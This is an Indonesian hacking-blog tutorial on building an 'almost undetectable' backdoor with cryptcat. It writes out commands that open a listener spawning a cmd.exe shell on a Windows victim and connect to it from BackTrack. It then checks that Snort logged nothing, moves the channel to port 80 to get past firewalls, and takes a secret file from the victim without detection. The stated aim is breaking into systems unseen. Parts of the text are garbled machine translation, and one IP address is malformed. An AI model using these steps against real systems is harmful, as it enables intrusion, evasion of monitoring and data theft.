Cara Membuat Backdoor Hampir Tidak Terdeteksi Dengan Cryptcat
Selamat datang kembali, para bibit hacker!
Pada postingan kali ini kita akan berbicara sedikit tentang netcat, ini memungkinkan untuk membuat koneksi antara 2 mesin dan mentransfer file atau menelurkan perintah shell agar memiliki sistem.
Meskipun keindahan dan keanggunan alat kecil ini, ia juga memiliki satu kelemahan-transfer utama antara komputer yang dapat terdeteksi oleh perangkat keamanan seperti firewall dan sistem deteksi intrusi (IDS).
Dalam tutorial ini, saya akan memperkenalkan kepada Anda sepupu populer dari netcat yaitu cryptcat (dia benar-benar jauh lebih manis dan lebih eksotis daripada netcat yang polos).
Cryptcat memungkinkan kita untuk berkomunikasi di antara 2 sistem dan mengenkripsi komunikasi antara mereka dengan twofish, salah satu dari banyak algoritma enkripsi sangat baik dari Bruce Schneier et al.
Enkripsi dari Twofish setara dengan enkripsi AES, sehingga hampir antipeluru. Dengan cara ini, IDS tidak dapat mendeteksi perilaku berbahaya yang terjadi bahkan ketika bepergian di port HTTP normal seperti 80 dan 443.
Berikut langkah-langkah dari Cryptcat:
Langkah 1: Download Cryptcat
Anda dapat mendownload dan menginstal Cryptcat pada sistem Windows dengan menggunakan link dibawah ini...
• https://sourceforge.net/projects/cryptcat/files/&usg=ALkJrhgHMpL9wvW8thiq9HC2YRzaenZ8IA
Langkah 2: Buka pendengar pada sistem Windows
Kita bisa membuka langsung pendengar pada sistem apapun dengan sintaks yang sama seperti netcat. Kita bisa membuka pendengar pada sistem Windows 7 port 6996 dan perintah pemijahan shell.
• cryptcat l p 6996 -e cmd.exe
• l berarti "membuka pendengar"
• p 6996 berarti "menempatkan pendengar pada port 6996"
• cmd.exe -e berarti "mengeksekusi perintah shell untuk koneksi"
Langkah 3: Buka Snort atau IDS lain
Sekarang ini, mari kita mulai untuk sebuah IDS seperti Snort pada sistem lain yang akan terhubung ke sistem Windows, ini melihat apakah enkripsi IDS mampu "buta", meninggalkan backdoor kami tampak seperti perangkat keamanan.
Langkah 4: Hubungkan ke sistem Windows dengan Cryptcat
Saat cryptcat terinstal secara default pada BackTrack, kita tidak perlu lagi mendownload dan menginstalnya. Selain di direktori / bin, jadi kita dapat mengaksesnya dari direktori manapun.
Sekarang, kita terhubung ke sistem Windows 7 dengan cryptcat dari sistem BackTrack dan melihat apakah kita dapat menyelesaikan koneksi dari backdoor terenkripsi yang hampir mustahil mendeteksi.
• cryptcat 192.168.4.182.248 6996 Seperti yang Anda lihat, kami terhubung sistem Windows 7 dan menerima perintah shell dari sistem Win 7 . Ini akan memberi kita kendali yang signifikan atas sistem itu, tapi tidak kontrol total sebagai kemampuan terbatas perintah shell.
Langkah 5: Periksa Snort Log dan pemberitahuan Anda
Semua Jenis serangan (lewat perintah kawat shell) mudah dideteksi oleh Snort atau IDS lain ketika koneksi terenkripsi. Aturan Snort mengingatkan sysadmin yang shell cmd.exe telah dilalui koneksi jaringan mereka, dan mereka cenderung melakukan sesuatu untuk membuat Anda menggunakan di shell command. Dengan koneksi terenkripsi tersedia dengan cryptcat, hubungan ini harus hampir tidak terdeteksi.
Mari kita kembali sekarang dan memeriksa log dan alert di Snort. Jika kami berhasil menghindari IDS, Anda harus melihat tanda ini mengenai perintah tidak bergerak kawat shell. Kami bisa memeriksa log kami dengan pergi ke / var / snort / alert dan melihat apakah ada tanda telah dipicu oleh hubungan kita dengan mesin Windows (biasanya, kita menemukan peringatan).
• kwrite / var / snort / alert Seperti yang Anda lihat, kami berhasil. Kami telah mampu menghubungkan sistem Windows tanpa memperingatkan salah satu sistem keamanan!
Langkah 6: Kirim Crypcat Port 80 untuk menghindari Firewall
Meskipun kita telah berhasil menciptakan sebuah backdoor terenkripsi dalam sistem korban, keamanan admin akan waspada melihat bahwa port yang tidak biasa (6996) terbuka. Kemungkinan akan memicu beberapa tindakan oleh keamanan admin untuk membatasi akses kami. Selain pada itu, pada sistem admin yang baik dan firewall bagus, port kemungkinan diblokir oleh firewall.
Untuk jaringan apapun dapat berkomunikasi di Internet, mereka mungkin perlu untuk tetap membuka port 80 dan 443 tetapi juga mungkin 25, 53, dan 110. Saat terenkripsi, lalu lintas dari Internet yang normal dikirimkan melalui port 80, hampir selalu terbuka dan sedikit lebih banyak lalu lintas akan hampir tidak bisa diperhatikan.
Sekarang kita telah berhasil mengunakan cryptcat, kami akan mengirimkannya melalui port 80 di semua lalu lintas internet lainnya. Meskipun itu akan dienkripsi, terlihat seperti data biner yang melintasi kawat. Ini akan menjadi hampir mustahil untuk perangkat keamanan mendeteksi atau memblok itu, karena mereka harus selalu mengizinkan lalu lintas pada port 80, dan lalu lintas dienkripsi, sehingga IDS tidak dapat melihat isinya.
Kini kita akan memindahkan file dari sistem korban disebut topsecret.txt untuk sistem serangan kami tanpa salah satu perangkat dari keamanan mendeteksi itu. Kali ini, alih-alih mengirim perintah kawat shell, kami akan segera mengirimkan file rahasia bernama topsecret.txt ke seluruh koneksi terenkripsi kami. Kita juga dapat melakukan ini dengan mengetik di prompt perintah Windows:
• cryptcat -lp 80 • l berarti "membuka pendengar"
• p 80 berarti "membuka pendengar yang pada port 80"
=
• Kini, mari kita terhubung ke sistem korban dan menarik seluruh file rahasia. Semua ini yang perlu kita lakukan adalah menghubungkan kepada si pendengar dengan mengetik cryptcat, alamat IP sistem korban, dan nomor port dari pendengar.
• cryptcat 192.168.182.248 80
Seperti yang Anda lihat, file yang datang di hubungan kita telah berhasil!
Langkah 8: Mari periksa
berkas Alerts
Kita sekali lagi memeriksa file log Snort untuk bukti bahwa IDS kami terdeteksi gerakan ini dari file rahasia.
• kwrite / var / snort / alert
Seperti yang Anda lihat, file rahasia kami berlayar ke kanan
melalui port 80 di bawah hidung dari sysadmin, IDS, dan
firewall tanpa jejak!
Cryptcat adalah alat kecil yang hebat untuk memindahkan data dari sistem korban di seluruh port yang terbuka normal tanpa salah satu dari perangkat keamanan mendeteksi.
Demikianlah tutorial tentang cara hack ke dalam sistem dan mengekstrak dari informasi tanpa terdeteksi. Selamat bersenang-senang!
Comments
Post a Comment
WeLcOmE TO My SiTeS